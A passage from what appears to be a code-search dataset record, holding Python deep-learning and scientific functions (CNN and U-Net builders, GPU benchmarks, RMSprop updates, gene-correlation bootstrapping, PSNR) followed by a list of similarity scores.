nn.ConvTranspose2d(num_filters[0],num_upsample_filters[0],\n upsample_strides[0],stride=upsample_strides[0],bias=False),\n BatchNorm2d(num_upsample_filters[0]),\n nn.ReLU(),)\n self.block2 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(block2_input_filters,num_filters[1],3,\n stride=layer_strides[1],bias=False),\n BatchNorm2d(num_filters[1]),\n nn.ReLU(),)\n for i in range(layer_nums[1]):\n self.block2.add(\n nn.Conv2d(num_filters[1], num_filters[1], 3, padding=1,bias=False))\n self.block2.add(BatchNorm2d(num_filters[1]))\n self.block2.add(nn.ReLU())\n self.deconv2 = Sequential(\n nn.ConvTranspose2d(num_filters[1],num_upsample_filters[1],\n upsample_strides[1],stride=upsample_strides[1],bias=False),\n BatchNorm2d(num_upsample_filters[1]),\n nn.ReLU(),)\n self.block3 = Sequential(\n nn.ZeroPad2d(1),\n nn.Conv2d(num_filters[1], num_filters[2], 3, stride=layer_strides[2],bias=False),\n BatchNorm2d(num_filters[2]),\n nn.ReLU(),)\n for i in range(layer_nums[2]):\n self.block3.add(nn.Conv2d(num_filters[2], num_filters[2], 3, padding=1,bias=False))\n self.block3.add(BatchNorm2d(num_filters[2]))\n self.block3.add(nn.ReLU())\n self.deconv3 = Sequential(\n nn.ConvTranspose2d(\n num_filters[2],num_upsample_filters[2],\n upsample_strides[2],stride=upsample_strides[2],bias=False),\n BatchNorm2d(num_upsample_filters[2]),\n nn.ReLU(),)\n\n num_cls = num_anchor_per_loc * num_class\n self.conv_cls = nn.Conv2d(sum(num_upsample_filters), num_cls, 1)\n self.conv_box = nn.Conv2d(sum(num_upsample_filters), num_anchor_per_loc * box_code_size, 1)\n self.conv_dir_cls = nn.Conv2d(sum(num_upsample_filters),num_anchor_per_loc * num_direction_bins, 1)", "def compute_BP(self, betas, bias, type, idx_to_keep = None):\n\n if idx_to_keep is not None:\n betas[self._all_but(len(betas),idx_to_keep)] = 0.\n\n if type == 'rates':\n y1 = self.responses_all[:,self.stimuli == -1]\n y2 = self.responses_all[:,self.stimuli == +1]\n if type == 'regressors':\n y1 = self.regressors[:,self.stimuli == -1]\n y2 = self.regressors[:,self.stimuli == +1]\n if type == 'shuffled':\n y_sh = self._shuffle_regressors()\n y1 = y_sh[:,self.stimuli == -1]\n y2 = y_sh[:,self.stimuli == +1]\n\n x1 = np.dot(betas, y1) + bias\n x2 = np.dot(betas, y2) + bias\n p_c_1 = 1 - expit(x1) # = p(c=-1|s=-1,x)\n p_c_2 = expit(x2)\n BP = np.sum(p_c_1) + np.sum(p_c_2)\n BP = BP/float(self.ntrials)\n return BP", "def run_simple_CNN():\n [train_set, test_set, train_sampler, val_sampler, test_sampler] = pre_processing_and_samples()\n CNN = SimpleCNN()\n # Using GPU for training\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(device)\n if torch.cuda.is_available():\n print(\"cuda is available\")\n CNN.to(device)\n\n # Multiple GPUs\n if torch.cuda.device_count() > 1:\n CNN = nn.DataParallel(CNN)\n\n num_epochs = 100\n\n train_loss_hist, train_acc_hist, val_loss_hist, val_acc_hist = \\\n trainCNN(net=CNN, device=device, batch_size=64, n_epochs=num_epochs, learning_rate=0.001,\n train_set=train_set, test_set=test_set, train_sampler=train_sampler, val_sampler=val_sampler)\n test(net=CNN, device=device, test_set=test_set, test_sampler=test_sampler)\n\n fig, (ax1, ax2) = plt.subplots(2)\n\n ax1.set_title(\"Loss vs. Number of Training Epochs\")\n ax1.set(xlabel=\"Training Epoch\", ylabel=\"Loss\")\n ax1.plot(range(1, len(train_loss_hist) + 1), train_loss_hist, label=\"Training\")\n ax1.plot(range(1, len(val_loss_hist) + 1), val_loss_hist, label=\"Validation\")\n print(np.concatenate((train_loss_hist, val_loss_hist)))\n print(np.amax(np.concatenate((train_loss_hist, val_loss_hist))))\n ax1.set_ylim(\n (0, 1.25 * np.amax(np.concatenate((train_loss_hist, val_loss_hist), axis=0, out=None)).detach().cpu()))\n ax1.set_xticks(np.arange(1, num_epochs + 1, 1.0))\n ax1.legend()\n\n ax2.set_title(\"Accuracy vs. Number of Training Epochs\")\n ax2.set(xlabel=\"Training Epoch\", ylabel=\"Accuracy\")\n ax2.plot(range(1, num_epochs + 1), train_acc_hist, label=\"Training\")\n ax2.plot(range(1, num_epochs + 1), val_acc_hist, label=\"Validation\")\n ax2.set_ylim(0, 100) # Sets y bounds\n ax2.set_xticks(np.arange(1, num_epochs + 1, 1.0))\n ax2.legend()\n\n plt.tight_layout() # Call after plotting all subplots\n plt.savefig('basic_cifar_10.png')", "def u_net_bn(x, is_train=False, reuse=False, pad='SAME', n_out=3):\n _, nx, ny, nz = x.shape\n print(\" * Input: size of image: (%d %d %d)\" % (nx, ny, nz))\n w_init = tf.truncated_normal_initializer(stddev=0.01)\n b_init = tf.constant_initializer(value=0.0)\n decay = 0.9\n gamma_init=tf.random_normal_initializer(1., 0.02)\n lrelu = lambda x: tf.nn.leaky_relu(x, 0.2)\n with tf.variable_scope(\"u_net_bn\", reuse=reuse):\n inputs = InputLayer(x, name='in')\n\n conv1 = Conv2d(inputs, 64, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=b_init, name='conv1')\n conv2 = Conv2d(conv1, 128, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv2')\n conv2 = BatchNormLayer(conv2, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn2')\n\n conv3 = Conv2d(conv2, 256, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv3')\n conv3 = BatchNormLayer(conv3, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn3')\n\n conv4 = Conv2d(conv3, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv4')\n conv4 = BatchNormLayer(conv4, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn4')\n\n conv5 = Conv2d(conv4, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv5')\n conv5 = BatchNormLayer(conv5, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn5')\n\n conv6 = Conv2d(conv5, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv6')\n conv6 = BatchNormLayer(conv6, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn6')\n\n conv7 = Conv2d(conv6, 512, (4, 4), (2, 2), act=None, padding=pad, W_init=w_init, b_init=None, name='conv7')\n conv7 = BatchNormLayer(conv7, decay=decay, act=lrelu, is_train=is_train, gamma_init=gamma_init, name='bn7')\n\n conv8 = Conv2d(conv7, 512, (4, 4), (2, 2), act=lrelu, padding=pad, W_init=w_init, b_init=b_init, name='conv8')\n print(\" * After conv: %s\" % conv8.outputs)\n\n up7 = DeConv2d(conv8, 512, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv7')\n up7 = BatchNormLayer(up7, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn7')\n\n # print(up6.outputs)\n up6 = ConcatLayer([up7, conv7], concat_dim=3, name='concat6')\n up6 = DeConv2d(up6, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv6')\n up6 = BatchNormLayer(up6, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn6')\n # print(up6.outputs)\n\n up5 = ConcatLayer([up6, conv6], concat_dim=3, name='concat5')\n up5 = DeConv2d(up5, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv5')\n up5 = BatchNormLayer(up5, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn5')\n # print(up5.outputs)\n\n up4 = ConcatLayer([up5, conv5] ,concat_dim=3, name='concat4')\n up4 = DeConv2d(up4, 1024, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv4')\n up4 = BatchNormLayer(up4, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn4')\n\n up3 = ConcatLayer([up4, conv4] ,concat_dim=3, name='concat3')\n up3 = DeConv2d(up3, 256, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv3')\n up3 = BatchNormLayer(up3, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn3')\n\n up2 = ConcatLayer([up3, conv3] ,concat_dim=3, name='concat2')\n up2 = DeConv2d(up2, 128, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv2')\n up2 = BatchNormLayer(up2, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn2')\n\n up1 = ConcatLayer([up2, conv2] ,concat_dim=3, name='concat1')\n up1 = DeConv2d(up1, 64, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv1')\n up1 = BatchNormLayer(up1, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn1')\n\n up0 = ConcatLayer([up1, conv1] ,concat_dim=3, name='concat0')\n up0 = DeConv2d(up0, 64, (4, 4), strides=(2, 2),\n padding=pad, act=None, W_init=w_init, b_init=None, name='deconv0')\n up0 = BatchNormLayer(up0, decay=decay, act=tf.nn.relu, is_train=is_train, gamma_init=gamma_init, name='dbn0')\n # print(up0.outputs)\n\n out = Conv2d(up0, n_out, (1, 1), act=tf.nn.sigmoid, name='out')\n\n print(\" * Output: %s\" % out.outputs)\n\n return out", "def speed():\r\n\r\n algo = ['logistic_sgd', 'logistic_cg', 'mlp', 'convolutional_mlp',\r\n 'dA', 'SdA', 'DBN', 'rbm', 'rnnrbm']\r\n to_exec = [True] * len(algo)\r\n# to_exec = [False] * len(algo)\r\n# to_exec[-1] = True\r\n do_float64 = True\r\n do_float32 = True\r\n do_gpu = True\r\n\r\n algo_executed = [s for idx, s in enumerate(algo) if to_exec[idx]]\r\n #Timming expected are from the buildbot that have an i7-920 @\r\n # 2.67GHz with hyperthread enabled for the cpu, 12G of ram. An GeForce GTX\r\n # 285 for the GPU. OS=Fedora 14, gcc=4.5.1, python/BLAS from EPD\r\n # 7.1-2 (python 2.7.2, mkl unknow). BLAS with only 1 thread.\r\n\r\n expected_times_64 = numpy.asarray([10.0, 22.5, 76.1, 73.7, 116.4,\r\n 346.9, 381.9, 558.1, 186.3])\r\n expected_times_32 = numpy.asarray([11.6, 29.6, 42.5, 66.5, 71,\r\n 191.2, 226.8, 432.8, 176.2])\r\n\r\n # Number with just 1 decimal are new value that are faster with\r\n # the Theano version 0.5rc2 Other number are older. They are not\r\n # updated, as we where faster in the past!\r\n # TODO: find why and fix this!\r\n\r\n# Here is the value for the buildbot on February 3th 2012.\r\n# sgd, cg mlp conv da\r\n# sda dbn rbm\r\n# gpu times[3.72957802, 9.94316864, 29.1772666, 9.13857198, 25.91144657,\r\n# 18.30802011, 53.38651466, 285.41386175]\r\n# expected [3.076634879, 7.555234910, 18.99226785, 9.58915591, 24.130070450,\r\n# 24.77524018, 92.66246653, 322.340329170]\r\n# sgd, cg mlp conv da\r\n# sda dbn rbm\r\n#expected/get [0.82492841, 0.75984178, 0.65092691, 1.04930573, 0.93125138\r\n# 1.35324519 1.7356905 1.12937868]\r\n expected_times_gpu = numpy.asarray([3.07663488, 7.55523491, 18.99226785,\r\n 9.6, 24.13007045,\r\n 20.4, 56, 302.6, 315.4])\r\n expected_times_64 = [s for idx, s in enumerate(expected_times_64)\r\n if to_exec[idx]]\r\n expected_times_32 = [s for idx, s in enumerate(expected_times_32)\r\n if to_exec[idx]]\r\n expected_times_gpu = [s for idx, s in enumerate(expected_times_gpu)\r\n if to_exec[idx]]\r\n\r\n def time_test(m, l, idx, f, **kwargs):\r\n if not to_exec[idx]:\r\n return\r\n print algo[idx]\r\n ts = m.call_time\r\n try:\r\n f(**kwargs)\r\n except Exception, e:\r\n print >> sys.stderr, 'test', algo[idx], 'FAILED', e\r\n l.append(numpy.nan)\r\n return\r\n te = m.call_time\r\n l.append(te - ts)\r\n\r\n def do_tests():\r\n m = theano.compile.mode.get_default_mode()\r\n l = []\r\n time_test(m, l, 0, logistic_sgd.sgd_optimization_mnist, n_epochs=30)\r\n time_test(m, l, 1, logistic_cg.cg_optimization_mnist, n_epochs=30)\r\n time_test(m, l, 2, mlp.test_mlp, n_epochs=5)\r\n time_test(m, l, 3, convolutional_mlp.evaluate_lenet5, n_epochs=5,\r\n nkerns=[5, 5])\r\n time_test(m, l, 4, dA.test_dA, training_epochs=2,\r\n output_folder='tmp_dA_plots')\r\n time_test(m, l, 5, SdA.test_SdA, pretraining_epochs=1,\r\n training_epochs=2, batch_size=300)\r\n time_test(m, l, 6, DBN.test_DBN, pretraining_epochs=1,\r\n training_epochs=2, batch_size=300)\r\n time_test(m, l, 7, rbm.test_rbm, training_epochs=1, batch_size=300,\r\n n_chains=1, n_samples=1, output_folder='tmp_rbm_plots')\r\n time_test(m, l, 8, rnnrbm.test_rnnrbm, num_epochs=1)\r\n return numpy.asarray(l)\r\n\r\n #test in float64 in FAST_RUN mode on the cpu\r\n import theano\r\n if do_float64:\r\n theano.config.floatX = 'float64'\r\n theano.config.mode = 'FAST_RUN'\r\n float64_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n\r\n #test in float32 in FAST_RUN mode on the cpu\r\n theano.config.floatX = 'float32'\r\n if do_float32:\r\n float32_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n\r\n if do_float64:\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr\r\n print >> sys.stderr, 'Duplicate the timing to have everything in one place'\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr, 'expected float64/float32', (\r\n expected_times_64 / float32_times)\r\n\r\n #test in float32 in FAST_RUN mode on the gpu\r\n import theano.sandbox.cuda\r\n if do_gpu:\r\n theano.sandbox.cuda.use('gpu')\r\n gpu_times = do_tests()\r\n print >> sys.stderr, algo_executed\r\n print >> sys.stderr, 'gpu times', gpu_times\r\n print >> sys.stderr, 'gpu expected', expected_times_gpu\r\n print >> sys.stderr, 'gpu % expected/get', (\r\n expected_times_gpu / gpu_times)\r\n\r\n if do_float64:\r\n print >> sys.stderr, 'float64/gpu', float64_times / gpu_times\r\n\r\n if (do_float64 + do_float32 + do_gpu) > 1:\r\n print >> sys.stderr\r\n print >> sys.stderr, 'Duplicate the timing to have everything in one place'\r\n print >> sys.stderr, algo_executed\r\n if do_float64:\r\n print >> sys.stderr, 'float64 times', float64_times\r\n print >> sys.stderr, 'float64 expected', expected_times_64\r\n print >> sys.stderr, 'float64 % expected/get', (\r\n expected_times_64 / float64_times)\r\n if do_float32:\r\n print >> sys.stderr, 'float32 times', float32_times\r\n print >> sys.stderr, 'float32 expected', expected_times_32\r\n print >> sys.stderr, 'float32 % expected/get', (\r\n expected_times_32 / float32_times)\r\n if do_gpu:\r\n print >> sys.stderr, 'gpu times', gpu_times\r\n print >> sys.stderr, 'gpu expected', expected_times_gpu\r\n print >> sys.stderr, 'gpu % expected/get', (\r\n expected_times_gpu / gpu_times)\r\n\r\n if do_float64 and do_float32:\r\n print >> sys.stderr, 'float64/float32', (\r\n float64_times / float32_times)\r\n print >> sys.stderr, 'expected float64/float32', (\r\n expected_times_64 / float32_times)\r\n if do_float64 and do_gpu:\r\n print >> sys.stderr, 'float64/gpu', float64_times / gpu_times\r\n print >> sys.stderr, 'expected float64/gpu', (\r\n expected_times_64 / gpu_times)\r\n if do_float32 and do_gpu:\r\n print >> sys.stderr, 'float32/gpu', float32_times / gpu_times\r\n print >> sys.stderr, 'expected float32/gpu', (\r\n expected_times_32 / gpu_times)\r\n\r\n def compare(x, y):\r\n ratio = x / y\r\n # If there is more then 5% difference between the expected\r\n # time and the real time, we consider this an error.\r\n return sum((ratio < 0.95) + (ratio > 1.05))\r\n\r\n if do_float64:\r\n err = compare(expected_times_64, float64_times)\r\n print >> sys.stderr, 'speed_failure_float64=' + str(err)\r\n if do_float32:\r\n err = compare(expected_times_32, float32_times)\r\n print >> sys.stderr, 'speed_failure_float32=' + str(err)\r\n if do_gpu:\r\n err = compare(expected_times_gpu, gpu_times)\r\n print >> sys.stderr, 'speed_failure_gpu=' + str(err)\r\n\r\n assert not numpy.isnan(gpu_times).any()", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(num_gpus=1)\n self._run_benchmark(params)", "def run_bootstrap_net_correlation_worker(run_parameters, spreadsheet_df, phenotype_df, network_mat,\n spreadsheet_genes_as_input, baseline_array, job_id):\n\n np.random.seed(job_id)\n\n restart_accumulator = np.zeros(network_mat.shape[0])\n gm_accumulator = np.ones(network_mat.shape[0])\n borda_count = np.zeros(network_mat.shape[0])\n\n phenotype_df = phenotype_df.iloc[[job_id], :]\n spreadsheet_df_trimmed, phenotype_df_trimmed, ret_msg = datacln.check_input_value_for_gene_prioritazion(\n spreadsheet_df, phenotype_df)\n\n sample_smooth = spreadsheet_df_trimmed.as_matrix()\n\n pearson_array = get_correlation(sample_smooth, phenotype_df_trimmed.values[0], run_parameters)\n n_bootstraps = run_parameters[\"number_of_bootstraps\"]\n for bootstrap_number in range(0, n_bootstraps):\n sample_random, sample_permutation = sample_a_matrix_pearson(\n sample_smooth, 1.0, run_parameters[\"cols_sampling_fraction\"])\n\n phenotype_response = phenotype_df_trimmed.values[0, None]\n phenotype_response = phenotype_response[0, sample_permutation]\n pc_array = get_correlation(sample_random, phenotype_response, run_parameters)\n\n pc_array[~np.in1d(spreadsheet_df_trimmed.index, spreadsheet_genes_as_input)] = 0.0\n pc_array = np.abs(trim_to_top_beta(pc_array, run_parameters[\"top_beta_of_sort\"]))\n restart_accumulator[pc_array != 0] += 1.0\n\n pc_array = pc_array / max(sum(pc_array), EPSILON_0)\n pc_array = kn.smooth_matrix_with_rwr(pc_array, network_mat, run_parameters)[0]\n pc_array = pc_array - baseline_array\n\n borda_count = sum_array_ranking_to_borda_count(borda_count, pc_array)\n gm_accumulator = (np.abs(pc_array) + EPSILON_0) * gm_accumulator\n\n restart_accumulator = restart_accumulator / n_bootstraps\n borda_count = borda_count / n_bootstraps\n # pcc_gm_array = gm_accumulator ** (1 / n_bootstraps)\n viz_score = (borda_count - min(borda_count)) / (max(borda_count) - min(borda_count))\n\n phenotype_name = phenotype_df_trimmed.index.values[0]\n gene_name_list = spreadsheet_df_trimmed.index\n gene_orig_list = spreadsheet_genes_as_input\n quantitative_score = borda_count\n generate_net_correlation_output(pearson_array, quantitative_score, viz_score, restart_accumulator,\n phenotype_name, gene_name_list, gene_orig_list, run_parameters)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def benchmark_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server')\n self._run_benchmark(params)", "def weight_update_rmsprop(self, network):\n epsilon = 10e-8\n gamma = self.gamma\n one_m_gamma = 1.0 - gamma\n\n if self.ms_b is None or self.ms_q is None:\n self.ms_b = []\n self.ms_q = []\n self.ms_rx_inp = []\n self.ms_ry_inp = []\n self.ms_rx_pos_out = []\n self.ms_ry_pos_out = []\n self.ms_rx_neg_out = []\n self.ms_ry_neg_out = []\n for l, layer in enumerate(network.layers):\n self.ms_b.append(np.zeros(layer.b.shape))\n self.ms_q.append(np.zeros(layer.q.shape))\n self.ms_rx_inp.append(np.zeros(layer.input_size))\n self.ms_ry_inp.append(np.zeros(layer.input_size))\n self.ms_rx_pos_out.append(np.zeros(layer.output_size))\n self.ms_ry_pos_out.append(np.zeros(layer.output_size))\n self.ms_rx_neg_out.append(np.zeros(layer.output_size))\n self.ms_ry_neg_out.append(np.zeros(layer.output_size))\n\n for l, layer in enumerate(network.layers):\n self.ms_b[l] = gamma * self.ms_b[l] + one_m_gamma * self.dc_db[l]**2\n self.ms_q[l] = gamma * self.ms_q[l] + one_m_gamma * self.dc_dq[l]**2\n\n self.ms_rx_inp[l] = gamma * self.ms_rx_inp[l] + one_m_gamma * self.dc_drx_inp[l]**2\n self.ms_ry_inp[l] = gamma * self.ms_ry_inp[l] + one_m_gamma * self.dc_dry_inp[l]**2\n\n self.ms_rx_pos_out[l] = gamma * self.ms_rx_pos_out[l] + one_m_gamma * self.dc_drx_pos_out[l]**2\n self.ms_ry_pos_out[l] = gamma * self.ms_ry_pos_out[l] + one_m_gamma * self.dc_dry_pos_out[l]**2\n self.ms_rx_neg_out[l] = gamma * self.ms_rx_neg_out[l] + one_m_gamma * self.dc_drx_neg_out[l]**2\n self.ms_ry_neg_out[l] = gamma * self.ms_ry_neg_out[l] + one_m_gamma * self.dc_dry_neg_out[l]**2\n\n layer.b += -self.alpha * self.dc_db[l] / np.sqrt(self.ms_b[l] + epsilon)\n layer.q += -self.alpha * self.dc_dq[l] / np.sqrt(self.ms_q[l] + epsilon)\n\n layer.rx_inp += -self.alpha * self.dc_drx_inp[l] / np.sqrt(self.ms_rx_inp[l] + epsilon)\n layer.ry_inp += -self.alpha * self.dc_dry_inp[l] / np.sqrt(self.ms_ry_inp[l] + epsilon)\n\n layer.rx_pos_out += -self.alpha * self.dc_drx_pos_out[l] / np.sqrt(self.ms_rx_pos_out[l] + epsilon)\n layer.ry_pos_out += -self.alpha * self.dc_dry_pos_out[l] / np.sqrt(self.ms_ry_pos_out[l] + epsilon)\n layer.rx_neg_out += -self.alpha * self.dc_drx_neg_out[l] / np.sqrt(self.ms_rx_neg_out[l] + epsilon)\n layer.ry_neg_out += -self.alpha * self.dc_dry_neg_out[l] / np.sqrt(self.ms_ry_neg_out[l] + epsilon)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def benchmark_xla_synth_1gpu_gpuparams(self):\n params = self._shared_params()._replace(\n num_gpus=1, variable_update='parameter_server', xla=True)\n self._run_benchmark(params)", "def evaluation(net, n_way, k_query, mdl_file, repnet, imgsz, batchsz):\n\t# we need to test 11788 - 8855 = 2933 images.\n\tdb = Cub('../CUB_200_2011_ZL/', n_way, k_query, train=False, episode_num= 1000//n_way//k_query, imgsz=imgsz)\n\tdb_loader = DataLoader(db, 1, shuffle=True, num_workers=1, pin_memory=True)\n\n\taccs = []\n\tfor batch in db_loader:\n\t\tx = Variable(batch[0]).cuda()\n\t\tx_label = Variable(batch[1]).cuda()\n\t\tatt = Variable(batch[2]).cuda()\n\t\tatt_label = Variable(batch[3]).cuda()\n\n\t\t# prepare for following procedure.\n\t\treal_batchsz = x.size(0)\n\t\tsetsz = x.size(1)\n\n\t\t# [b, setsz, c, h, w] => [b*setsz, c, h, w]\n\t\tx = x.view(real_batchsz * setsz, 3, imgsz, imgsz)\n\t\t# [small batch, c, h, w]\n\t\tx_chunks = torch.chunk(x, batchsz * n_way, dim=0)\n\t\tfeatures = []\n\t\tfor img in x_chunks:\n\t\t\t# [small batch, 512, 1, 1] => [small batch, 512]\n\t\t\tfeature = repnet(img).view(img.size(0), 512)\n\t\t\tfeatures.append(feature)\n\t\t# [b*setsz, 512] => [real batch, setsz, 512]\n\t\tx = torch.cat(features, dim=0).view(real_batchsz, setsz, 512)\n\t\t# detach gradient !!!\n\t\tx = x.detach()\n\n\t\tpred, correct = net(x, x_label, att, att_label, False)\n\t\tcorrect = correct.sum().data[0] # multi-gpu\n\n\t\t# preds = torch.cat(preds, dim= 1)\n\t\tacc = correct / ( x_label.size(0) * x_label.size(1) )\n\t\taccs.append(acc)\n\n\t\t# if np.random.randint(10)<1:\n\t\t# \tprint(pred[0].cpu().data.numpy(), att_label[0].cpu().data.numpy())\n\tprint(accs)\n\n\t# compute the distribution of 600/episodesz episodes acc.\n\tglobal best_accuracy\n\taccuracy = np.array(accs).mean()\n\tprint('<<<<<<<<< %d way accuracy:'%n_way, accuracy, 'best accuracy:', best_accuracy, '>>>>>>>>')\n\n\tif accuracy > best_accuracy:\n\t\tbest_accuracy = accuracy\n\t\ttorch.save(net.state_dict(), mdl_file)\n\t\tprint('Saved to checkpoint:', mdl_file)\n\n\treturn accuracy", "def inference():\n inf_dataset = dataset\n net.eval()\n frames_gen, frame_cnt, rel_props, prop_ticks, prop_scaling = inf_dataset[index]\n \n num_crop = args.test_crops\n length = 3\n if args.modality == 'Flow':\n length = 10\n elif args.modality == 'RGBDiff':\n length = 18\n \n # First get the base_out outputs\n base_output = torch.autograd.Variable(torch.zeros((num_crop, frame_cnt, base_out_dim)).cuda(),\n volatile=True)\n cnt = 0\n for frames in frames_gen:\n # frames.shape == [frame_batch_size * num_crops * 3, 224, 224]\n # frame_batch_size is 4 by default\n input_var = torch.autograd.Variable(frames.view(-1, length, frames.size(-2), frames.size(-1)).cuda(),\n volatile=True)\n base_out = net(input_var, None, None, None, None)\n bsc = base_out.view(num_crop, -1, base_out_dim)\n base_output[:, cnt:cnt+bsc.size(1), :] = bsc\n cnt += bsc.size(1)\n\n n_frames = base_output.size(1)\n assert frame_cnt == n_frames\n # GLCU\n step_features = base_output.mean(dim=0).mean(dim=0).unsqueeze(0)\n gate, glcu_task_pred = net.glcu(step_features)\n glcu_task_pred = F.softmax(glcu_task_pred.squeeze(), dim=0).data.cpu().numpy()\n gate = gate.repeat(1, num_crop * n_frames).view(num_crop, n_frames, base_out_dim)\n if net.additive_glcu:\n base_output = base_output + gate\n else:\n base_output = base_output * gate\n\n # output.shape == [num_frames, 7791]\n output = torch.zeros((frame_cnt, output_dim)).cuda()\n cnt = 0\n for i in range(0, frame_cnt, 4):\n base_out = base_output[:, i:i+4, :].contiguous().view(-1, base_out_dim)\n rst = net.test_fc(base_out)\n sc = rst.data.view(num_crop, -1, output_dim).mean(dim=0)\n output[cnt: cnt + sc.size(0), :] = sc\n cnt += sc.size(0)\n base_output = base_output.mean(dim=0).data\n\n # act_scores.shape == [num_proposals, K+1]\n # comp_scores.shape == [num_proposals, K]\n act_scores, comp_scores, reg_scores = reorg_stpp.forward(output, prop_ticks, prop_scaling)\n act_scores = torch.autograd.Variable(act_scores, volatile=True)\n comp_scores = torch.autograd.Variable(comp_scores, volatile=True)\n\n # Task Head\n combined_scores = F.softmax(act_scores[:, 1:], dim=1) * torch.exp(comp_scores)\n combined_scores = combined_scores.mean(dim=0).unsqueeze(0)\n task_pred = F.softmax(net.task_head(combined_scores).squeeze(), dim=0).data.cpu().numpy()\n\n act_scores = act_scores.data\n comp_scores = comp_scores.data\n\n if reg_scores is not None:\n reg_scores = reg_scores.view(-1, num_class, 2)\n reg_scores[:, :, 0] = reg_scores[:, :, 0] * stats[1, 0] + stats[0, 0]\n reg_scores[:, :, 1] = reg_scores[:, :, 1] * stats[1, 1] + stats[0, 1]\n\n torch.cuda.empty_cache() # To empty the cache from previous iterations\n\n # perform stpp on scores\n return ((inf_dataset.video_list[index].id,\n (rel_props.numpy(), act_scores.cpu().numpy(), comp_scores.cpu().numpy(), reg_scores.cpu().numpy(), \n glcu_task_pred, task_pred),\n output.cpu().numpy(),\n base_output.cpu().numpy()))", "def _comput_PSNR(self, input, target):\n shave = 4\n ch, h, w = input.size()\n input_Y = rgb2ycbcrT(input.cpu())\n target_Y = rgb2ycbcrT(target.cpu())\n diff = (input_Y - target_Y).view(1, h, w)\n\n diff = diff[:, shave:(h - shave), shave:(w - shave)]\n mse = diff.pow(2).mean()\n psnr = -10 * np.log10(mse)\n return psnr" ]
[ "0.6702836", "0.60820144", "0.57397383", "0.5513961", "0.5449203", "0.5389235", "0.53726816", "0.5317791", "0.5255269", "0.5254749", "0.5192296", "0.517288", "0.51403135", "0.5121367", "0.51208645", "0.51208645", "0.511794", "0.51084936", "0.5106065", "0.5099034", "0.5092202", "0.5073547", "0.50673836", "0.50488716", "0.50338435", "0.502055", "0.5012428", "0.501089", "0.5002971", "0.49716663", "0.49546856", "0.49401686", "0.49401686", "0.4932358", "0.49209988", "0.49204868", "0.49184752", "0.4916693", "0.49037102", "0.48946956", "0.48838368", "0.48787674", "0.48730496", "0.48694572", "0.48672712", "0.48630452", "0.4860934", "0.48596287", "0.4851591", "0.48455057", "0.48454162", "0.48446012", "0.4840251", "0.48401853", "0.48350665", "0.4833516", "0.48317856", "0.48277622", "0.4827165", "0.48258263", "0.48231295", "0.48189723", "0.48168334", "0.48123232", "0.48073128", "0.47961852", "0.47952184", "0.47950086", "0.47944933", 